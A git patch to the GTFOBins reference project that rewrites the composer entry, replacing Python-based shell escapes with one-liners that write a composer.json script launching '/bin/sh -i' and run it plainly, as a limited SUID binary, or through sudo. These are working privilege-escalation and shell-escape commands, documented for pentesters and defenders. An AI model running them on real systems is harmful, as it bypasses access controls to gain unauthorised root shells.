From 03c30e9944ec9023befaf8cf8a7dde4d51e5fc8a Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 8 Nov 2020 10:33:56 +0100 Subject: [PATCH] Update composer - align to the GTFOBins conventions - avoid Python - use limited SUID instead of just SUID --- _gtfobins/composer.md | 29 ++++++++++++----------------- 1 file changed, 12 insertions(+), 17 deletions(-) diff --git a/_gtfobins/composer.md b/_gtfobins/composer.md index 70d66a0..2b8cb66 100644 --- a/_gtfobins/composer.md +++ b/_gtfobins/composer.md @@ -1,23 +1,18 @@ --- functions: - suid: + shell: - code: | - cat << EOF > composer.json - { - "scripts": { - "command": "python3 -c 'import pty;pty.spawn(\"bash\")'" - } - } - EOF - ./composer run-script command + TF=$(mktemp -d) + echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json + composer --working-dir=$TF run-script x + limited-suid: + - code: | + TF=$(mktemp -d) + echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json + ./composer --working-dir=$TF run-script x sudo: - code: | - cat << EOF > composer.json - { - "scripts": { - "command": "python3 -c 'import pty;pty.spawn(\"bash\")'" - } - } - EOF - composer run-script command + TF=$(mktemp -d) + echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json + sudo composer --working-dir=$TF run-script x ---